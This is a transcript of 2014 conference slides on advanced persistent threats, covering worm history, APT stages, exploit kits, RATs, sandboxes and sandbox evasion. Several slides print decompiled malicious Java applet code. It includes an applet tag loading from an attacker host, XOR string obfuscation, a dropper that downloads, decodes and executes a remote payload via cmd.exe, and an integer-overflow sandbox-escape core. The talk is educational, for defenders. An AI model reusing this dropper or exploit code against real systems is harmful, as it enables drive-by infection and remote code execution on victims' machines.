the magic world of apt 0.6 - pompili
DESCRIPTION
Slides from Simone Pompili talk @Codemotion Roma 2014TRANSCRIPT
![Page 1: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/1.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
![Page 2: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/2.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
![Page 3: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/3.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Come si sviluppa un attacco?
<#1>
<#2>
<#3>
![Page 4: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/4.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
![Page 5: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/5.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
<2000>
8,7 miliardi di dollari
![Page 6: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/6.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<2001> The Nimda Style
Microsoft IIS e PWS Extended Unicode Directory transversal Vulnerability
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability TFTP Server
UDP:69
RICHED20.DLL
Microsoft Office 2000 DLL Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability
635 milioni di dollari
![Page 7: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/7.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
SQL Server 2000 Desktop Engine
75.000 computer infettati in soli 10 minuti
payload di soli 376 byte (residente esclusivamente in memoria)
1,2 miliardi di dollari
![Page 8: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/8.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
22,6 miliardi di dollari
DDOS contro www.sco.com
Upload&Execute 0x85 0x13 0x3c 0x9e 0xa2
Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
![Page 9: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/9.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Shopping For Zero-Days
![Page 10: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/10.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Il Malware più complesso della storia
> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)
> 80 domini utilizzati come sistemi di Comando e Controllo
> Diffusione via USB Stick (Infectmedia)
> Enumerazione dei dispositivi
Bluetooth (Beetlejuice)
> Registrazione audio (Microbe)
> Windows Update MITM (Munch & Gadget)
MD5 Collision Attack
![Page 11: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/11.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
![Page 12: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/12.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
« »
![Page 13: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/13.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Advanced Persistent Threats 101
> Trust Exploitation
Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
![Page 14: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/14.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
Exploit Pack (e.g. Neutrino) 0-Day
Advanced Persistent Threats 101
![Page 15: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/15.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage Shellcoding Dropper/Downloader Modules (e.g. RAT, Infostealer, etc.) Good Covert Channel
Advanced Persistent Threats 101
![Page 16: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/16.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
Email Web Sites Botnet Physical (USB)
Advanced Persistent Threats 101
![Page 17: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/17.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
> Trust Exploitation
> Client Exploitation
> Multi-Stage
> Multi-Vector
> Resiliency
Camouflaging Command & Control Good Covert Channel
Advanced Persistent Threats 101
![Page 18: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/18.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Make or Buy?
![Page 19: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/19.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Botnet Choice
![Page 20: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/20.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Drive-to-Click <#1>
![Page 21: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/21.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Drive-to-Click <#2>
![Page 22: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/22.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Drive-to-Click <#3>
![Page 23: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/23.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Drive-to-Click <#4>
![Page 24: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/24.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Drive-to-Click <#5>
![Page 25: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/25.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Trick#1> Giochiamo con le estensioni
RLO Unicode control character
![Page 26: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/26.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
![Page 27: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/27.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<applet codebase=“http://blahblah.evilsite.in/hiddenpath/"
archive=“http://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9” code=“rgmiv”>
Trick#3> Client Exploiting
![Page 28: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/28.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
![Page 29: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/29.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>u\b:6+7>\0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
![Page 30: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/30.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
![Page 31: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/31.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
![Page 32: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/32.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
...
private static void lcsqyrgtbct (String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel= Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos= new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class
![Page 33: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/33.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte obj10 = new byte[] {0, -1}
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
The Malware Core
http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
![Page 34: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/34.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Cheaper Path to Exploiting Blackole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
RedKit
http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
![Page 35: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/35.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The InfoStealer Choice
![Page 36: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/36.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The RAT Choice
![Page 37: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/37.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Bitcoin + APT = Ransomware
![Page 38: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/38.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Command&Control Choice <#1>
![Page 39: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/39.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Command&Control Choice <#2>
![Page 40: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/40.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Command&Control Choice <#3>
![Page 41: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/41.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Command&Control Choice <#4>
![Page 42: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/42.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-
resourced nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
<2012> The Antivirus Maker Confession
![Page 43: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/43.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
The Way to Sandboxing
![Page 44: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/44.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger) <02> KERNEL-MODE PATCHING
Guest operating system Kernel modified for tracing (rootkit) <03> VIRTUAL MACHINE MONITORING
Customized Hypervisor to monitor the guest operating system <04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc. <05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.
The Way to Sandboxing
![Page 45: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/45.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Una lista (molto) parziale dei Player > Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
![Page 46: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/46.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
![Page 47: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/47.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Una lista (completamente) parziale degli Evader
![Page 48: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/48.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012)
> MessageBox (Something that need to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
![Page 49: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/49.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Il limite delle Sandbox
Minuti
def: il Paziente Zero è il primo paziente individuato nel
campione della popolazione di un'indagine
epidemiologica…
![Page 50: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/50.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Sicuramente meglio che confidare negli utenti
![Page 51: The magic world of APT 0.6 - Pompili](https://reader033.vdocuments.us/reader033/viewer/2022051608/5459568daf7959755d8b55a9/html5/thumbnails/51.jpg)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
ROME 11-12.04.2014 www.codemotionworld.com
Domande? Italian
مطالب أيةArabic
¿Preguntas? Spanish
Questions? English
tupoQghachmey Klingon
Sindarin
Japanese
Ερωτήσεις? Greek
вопросы? Russian